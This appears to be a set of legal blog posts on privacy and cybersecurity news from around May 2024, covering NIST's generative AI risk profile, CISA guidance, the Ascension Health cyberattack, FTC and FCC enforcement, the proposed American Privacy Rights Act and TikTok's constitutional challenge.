Generative artificial intelligence (AI) has opened a new front in the battle to keep confidential information secure. The National Institute of Standards and Technology (NIST) recently released a draft report highlighting the risk generative AI poses to data security. The report, entitled “Artificial Intelligence Risk Management Framework:  Generative Artificial Intelligence Profile,” details generative AI’s potential data security pitfalls and suggests actions for generative AI management.

NIST identifies generative AI’s data security risk as “[l]eakage and unauthorized disclosure or de-anonymization of biometric, health, location, personally identifiable [information], or other sensitive data.” Training generative AI requires an enormous amount of data culled from the internet and other publicly available sources. For example, ChatGPT4 was trained with 570 gigabytes from books, web texts, articles, and other writing on the internet, which amounts to about 300 billion words residing in a generative AI database. Much of generative AI’s training data is personal, confidential, or sensitive information. 

Generative AI systems have been known to disclose any information within its training data, including confidential information, upon request. During adversarial attacks, large language models have revealed private or sensitive information within their training data, including phone numbers, code, and conversations. The New York Times has sued ChatGPT’s creator, OpenAI, alleging in part that ChatGPT will furnish articles behind the Times paywall. This disclosure risk poses obvious data security issues.

Less obvious are the data security issues that generative AI’s capacity for predictive inference poses. With the vast quantity of data available to generative AI, it can correctly infer personal or sensitive information, including a person’s race, location, gender, or political leanings – even if that information is not within the AI’s training data. NIST warns that these AI models, or individuals using the models, might disclose this inferred information, use it to undermine privacy or apply it in a discriminatory manner. Already, we have seen a company settle an EEOC lawsuit alleging that it used AI to make discriminatory employment decisions.  Generative AI threatens to increase this legal exposure. 

From an AI governance perspective, NIST suggests several broad principles to mitigate the data privacy risk. Among other things, NIST recommends:

  • Aligning generative AI use with applicable laws, including those related to data privacy and the use, publication, or distribution of intellectual property;
  • Categorizing different types of generative AI content with associated data privacy risks;
  • Develop an incident response plan specifically tailored to address breaches, and regularly test and update the incident response plan with feedback from external and third-party stakeholders;
  • Establish incident response plans for third-party generative AI technologies deemed high-risk. As with all incident response plans, this incident response plan should include:
    • Communicating third-party generative AI incident response plans to all relevant AI actors;
    • Defining ownership of the incident response functions;
    • Rehearsing (or “table topping”) the incident response plans regularly;
    • Regular review of incident response plans for alignment with relevant breach reporting, data protection, data privacy, or other laws;
  • Update and integrate due diligence processes for generative AI acquisition and procurement vendor assessments to include data privacy, security, and other risks; and
  • Conduct periodic audits and monitor AI-generated content for privacy risks.

These actions will involve more than simply adding a reference to artificial intelligence to existing cybersecurity plans. They will involve carefully analyzing a company’s legal obligations, its contract obligations, and the company culture to design an AI governance plan that keeps confidential information out of the public domain and away from bad actors.

The Cybersecurity and Infrastructure Security Agency (CISA) and its partners recently issued helpful guidance for entities that have limited resources to address cyber threats. The guidance, entitled “Mitigating Cyber Threats with Limited Resources: Guidance for Civil Society,” is targeted to assist civil society—“nonprofit, advocacy, cultural, faith-based, academic, think tanks, journalist, dissident, and diaspora organizations, communities, and individuals involved in defending human rights and advancing democracy,” which are considered “high risk communities” because they “are targeted by state-sponsored threat actors who seek to undermine democratic values and interests” with addressing cybersecurity risks with limited resources.

According to the guidance, state-sponsored attacks against civil society are primarily launched by “the governments of Russia, China, Iran, and North Korea.” The threat actors are conducting “extensive pre-operational research to learn about potential victims, gather information to support social engineering, or obtain login credentials,” and are using spyware applications to collect data from victims.

The guidance is designed to provide “mitigation measures for civil society organizations to reduce their risk based on common cyber threats” and civil society organizations and affiliated individuals are “strongly encourage[d]…to apply the mitigations provided in this joint guide.”

If you fall into the civil society organization category, you may wish to consider delving into the guidance with your IT professionals to learn more about the threat and how to mitigate the risk of a cyber-attack from state-sponsored actors and other threat actors.

The newest health care entity to be hit by a cyberattack is Ascension Health, which operates 140 hospitals and 40 assisted living facilities in 19 states. Ascension confirmed that it has been hit by a cybersecurity attack and that the attack has disrupted its clinical operations. Ascension detected the attack on May 8, 2024, and is in the process of investigating and responding to it.

The attack has reportedly affected clinical operations in Florida, Indiana, Michigan, Oklahoma, Texas, and Wisconsin. Ascension recommends that its business partners contact its IT professionals to determine whether any connections to Ascension systems are at risk.

Unfortunately, threat actors continue to attack health care entities, and the pace does not appear to be abating. As a result, it is important for health care entities to prepare for an incident by implementing an incident response plan, frequent testing of the plan, testing contingent operations and disaster recovery plans, and conducting tabletop exercises to prepare for attacks.

This week, the Massachusetts Supreme Judicial Court (SJC) reviewed a lower court’s dismissal of gun-related indictments against Richard Dilworth, Jr., related to the state’s refusal to disclose the bitmojis and usernames it used to conduct online surveillance through Snapchat accounts in 2017 and 2018.

Police arrested Dilworth for possession of a loaded revolver after Boston police saw eight Snapchat videos in which Dilworth appeared to be holding a gun. Dilworth was also arrested again after the initial arrest, and again while in possession of a firearm, again after police saw him holding a gun on Snapchat. 

During discovery, Dilworth sought the bitmojis and usernames to determine whether the police used Snapchat to target non-white individuals in violation of the Equal Protection Clause of the U.S. Constitution. The state claimed that the Snapchat surveillance targeted individuals suspected of criminal behavior based on tips received from informants.

The state argued that it could not comply with the discovery order because disclosure of the information would compromise informants and police officers, but the Suffolk Superior Court rejected that argument and granted Dilworth’s motion.

On appeal, during oral arguments, the SJC questioned the defendant’s attorney about how the bitmojis and usernames would strengthen the argument that the state had conducted selective prosecution. As further support, Dilworth’s attorney explained that the defense had conducted an informal survey of public defenders whose clients had been the subject of Snapchat surveillance; the survey showed that 17 out of 20 cases targeted Black individuals, and the other 3 were Hispanic individuals.

Dilworth’s attorney argued that the discretionary choices made by the officers in setting up the investigatory scheme (i.e., the use of Black bitmojis) went to the core claim that Dilworth was targeted because of his race. However, Justice Serge Georges, Jr., interjected that Dilworth was targeted because “he can’t stop flashing and posting videos of guns.” Justice Georges continued, “Mr. Dilworth was arrested after whatever was witnessed online, and no sooner does he hit the street, he does it again. So, it’s not this generalized kind of targeting that I see here. It’s a specific targeting.” The defendant’s counsel replied that the information the defense had developed raised questions about the true purpose of the surveillance.

We will await the SJC’s decision on the legality of this Snapchat surveillance and how that decision could affect other types of social media surveillance and profiling.

In the latest surge of lawsuits against retailers for embedding tracking technology into websites, yummy cookie company Crumbl was sued on May 1, 2024, for allegedly embedding web-tracking technology allowing third-party processing company Stripe to obtain, without consumer consent, customers’ names, email and delivery addresses, geographic locations, IP addresses, and payment information when consumers surf Crumbl’s website without their consent.

The complaint alleges that Stripe can then identify consumers “across devices, networks, and identities” and then share that information to additional third parties. In addition, the tracking technology code remain on the consumers’ browser after the consumer has made their purchase, which enables Stripe to capture additional data about the consumer when visiting other websites.

The complaint alleges that “Stripe engages in the surreptitious interception and collection of sensitive information, including consumers’ mouse movements and clicks, keystrokes, IP address, geolocation, and financial information.”In addition, the complaint alleges that Stripe has shared this information with third parties without consumers’ consent.

The complaint alleges that the conduct violates the California Invasion of Privacy Act, a criminal statute designed to address wire taps. It will arguably be an uphill battle to prove that there is criminal intent when it comes to website tracking technology. The complaint further alleges that the conduct violates California’s Constitution.

The Federal Trade Commission (FTC) has assumed the authority to enforce unauthorized data disclosures under the Federal Trade Commission Act (FTC Act). During the past three weeks, the FTC has used this authority to go after healthcare companies that disclose their customers’ personal data without permission.

On April 11, the FTC sued Monument, an online addiction treatment company, for violating the FTC Act. Specifically, the FTC alleged that Monument: (1) failed to employ reasonable measures to prevent the disclosure of consumers’ health information via tracking technologies to third parties for advertising purposes; (2) failed to obtain its customers’ “affirmative express consent” before disclosing their health information to third parties; (3) misrepresenting that it would not disclose their customers’ health information without their knowledge or consent; and (4) misrepresenting that it was compliant with the Health Insurance Portability and Accountability Act (HIPAA). The same day the FTC filed the complaint, Monument entered into a stipulated order that bans it from disclosing health information for advertising purposes and must obtain users’ affirmative consent before sharing health information with third parties for any purpose.

Cerebral, a telehealth firm, did not get off as easily. The FTC charged Cerebral with violating the FTC Act by disclosing its customers’ personal health information and other sensitive data to third parties for advertising purposes and failing to honor its easy cancellation promises. On April 15, the FTC obtained an order restricting how Cerebral can use or disclose sensitive information and provide customers with a simple way to cancel. It also hit Cerebral with a $5 million judgment and a $2 million civil penalty, with another $8 million penalty suspended premised upon the “truthfulness, accuracy, and completeness” of Cerebral’s sworn financial attestations going forward.

The FTC also sued BetterHelp, an online therapy firm, for violating the FTC Act. Like Monument and Cerebral, BetterHelp was charged with disclosing its customers’ personal information – including their email addresses, IP addresses, and health questionnaire information – to third parties for advertising purposes. The FTC also alleged that BetteHelp failed to maintain sufficient policies or procedures to protect its users’ health data or to limit how third parties could use that information. The FTC charged that this use violated BetterHelp’s own privacy policy. On May 6, the FTC issued a proposed order banning BetterHelp from sharing consumers’ health data for advertising purposes and requiring the company to pay restitution of $7.8 million to its customers. 

The FTC has made its points clearly. Companies that obtain their users’ health information must implement appropriate policies and procedures to protect that information. If those companies disclose or sell that information to third parties for advertising or any other purpose, they must (1) advise their customers of that potential disclosure; (2) obtain the customers’ affirmative express consent; and (3) only disclose that data in accordance with its policies and the customers’ consent.

Congress is once again entertaining federal privacy legislation. The American Privacy Rights Act (APRA) was introduced by Senate Commerce Committee Chair Maria Cantwell (D-WA) and House Energy and Commerce Chair Cathy McMorris Rodgers (R-WA).

Unlike current laws, the APRA would apply to both commercial enterprises and nonprofit organizations, as well as common carriers regulated by the Federal Communications Commission (FCC). The law would have a broad scope but provide a conditional exemption for small businesses with less than $40 million in revenue and data on fewer than 200,000 consumers. However, this exemption would not apply if the small business transfers data to third parties for value. The APRA would require data minimization, i.e., prohibiting covered entities from collecting more personal information than is strictly necessary for the stated purpose.

The APRA defines sensitive data broadly as data related to government identifiers, health, biometrics, genetics, financial accounts and payments, precise geolocation, log-in credentials, private communications, revealed sexual behavior, calendar or address book data, phone logs, photos and recordings for private use, intimate imagery, video viewing activity, race, ethnicity, national origin, religion or sex, online activities over time and across third-party websites, information about a minor under the age of 17, and other data the FCC defines as sensitive covered data by regulation. Sensitive data would require affirmative express consent before transfer to third parties. Those meeting the definition of “covered entities would need to give clear disclosures and easy opt-out options.

Notably, the APRA is a departure from the current federal standard set by the Children’s Online Privacy Protection Act (COPPA), which places the cutoff at 13.

The APRA would require algorithmic bias impact assessments for “covered algorithms” that make consequential decisions. It would also prohibit discriminatory use of data. “Large data holders” and “covered high-impact social media companies” would face additional obligations around reporting, algorithm audits, and designated privacy/security officers.

While privacy professionals across the country will collectively groan at a law other than HIPAA using the term “covered entity,” the simplicity of a single standard rather than the current patchwork of state laws may just be worth the headache of two federal privacy laws using the same term with different definitions. However, it remains to be seen whether the APRA will make it to the Congress floor. We’ve reported in the past about attempts at a federal standard that ended up stalling in committee.

You can read the full APRA draft here.

As threatened, TikTok, Inc. and ByteDance, Ltd., the owner of the TikTok app, filed suit against the United States on May 7, 2024, alleging that the Protecting Americans From Foreign Adversary Controlled Applications Act (“the Act”) is unconstitutional and is a violation of the free speech of 170 million Americans who use the app. 

The 77-page petition, filed in the U. S. Court of Appeals for the D.C. Circuit, alleges that ByteDance is unable to divest TikTok, that such “is simply not possible: not commercially, not technologically, not legally. And certainly not on the 270 -day timeline required by the Act.”

The petitioners allege that divesting the U.S. TikTok platform is not commercially viable and would “dramatically undermine the value and viability of the U.S. TikTok business.” In addition, the petitioners allege that moving TikTok’s source code from ByteDance to a new owner would require that the code be moved to an alternative team of engineers, which would “take years.” They also allege that the Chinese government will not permit a divestment of the algorithms that are at the heart of TikTok as “the Chinese government clearly signaled that it would assert its export control powers with respect to any attempt to sever TikTok’s operations from ByteDance,” That affirmation alone is worthy of why the Act is so important for national security. The Chinese government will not allow the algorithms being used on the TikTok platform, which is used to suggest a review of content and are arguably manipulative, to be divested and, therefore, out of its potential purview and control.

The petition alleges that the Act is a violation of the First Amendment, is an unconstitutional bill of attainder, a violation of Article I of the U.S. Constitution, and a violation of the Fifth Amendment’s Due Process and Takings Clauses. The relief requested includes a declaratory judgment that the Act violates the U.S. Constitution, an order enjoining the Attorney General from enforcing the Act, and a judgment in favor of petitioners.

For TikTok users, the law is applicable unless a Court rules otherwise. Transitioning away from TikTok while the issue moves through litigation is one way to respond to the Act and the subsequent dispute. There are other social media platforms to use that are not deemed a national security threat by the federal government.

In response to the growing threat by pro-Russia hacktivists, on May 1, 2023, CISA and other national agency partners issued an Alert to operators of industrial control systems and small-scale operational technology systems in North America and Europe on mitigation techniques for cyber operations to prevent a compromise of industrial control systems, including “Water and Wastewater Systems, Dams, Energy, and Food and Agriculture Sectors.”

The Alert, entitled “Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity”, outlines the ongoing threat posed by pro-Russia hacktivists concentrating remote control over industrial control systems, including successful attacks against several U.S.-based wastewater systems, which caused disruption in the systems, including “causing water pumps and blower equipment to exceed their normal operating parameters,…altered settings, turned off alarm mechanisms, and changed administrative passwords to lock out the WWS operators.”

The Alert provides mitigations to prevent and respond to the ongoing threat that industrial control operators may wish to review.

The Federal Communications Commission (FCC) has announced that it has levied almost $200 million in fines against “the nation’s largest wireless carriers for illegally sharing access to customers’ location information without consent and without taking reasonable measures to protect that information against unauthorized disclosure.”

The FCC’s allegations include that the carriers sold access to customers’ location information to aggregators, which then resold the data to third-party location-based service providers. The disclosure to the aggregators and the redisclosures to third parties did not include customer consent. The FCC alleged that “customers’ real-time location information, revealing where they go and who they are,” is some of the most sensitive data in carriers’ possession.”

The fines against the wireless carriers stem from a violation of § 222 of the Communications Act, which requires carriers to “take reasonable measures to protect certain customer information, including location information,” as well as maintain the confidentiality of the data and obtain “affirmative, express customer consent before using, disclosing, or allowing access to such information. The FCC maintains that these obligations apply when the carriers share customer information with third parties.

The FCC’s Privacy and Data Protection Task Force led the investigation, which started with customer complaints that a Missouri Sheriff was using a location-finding service to track the location of individuals.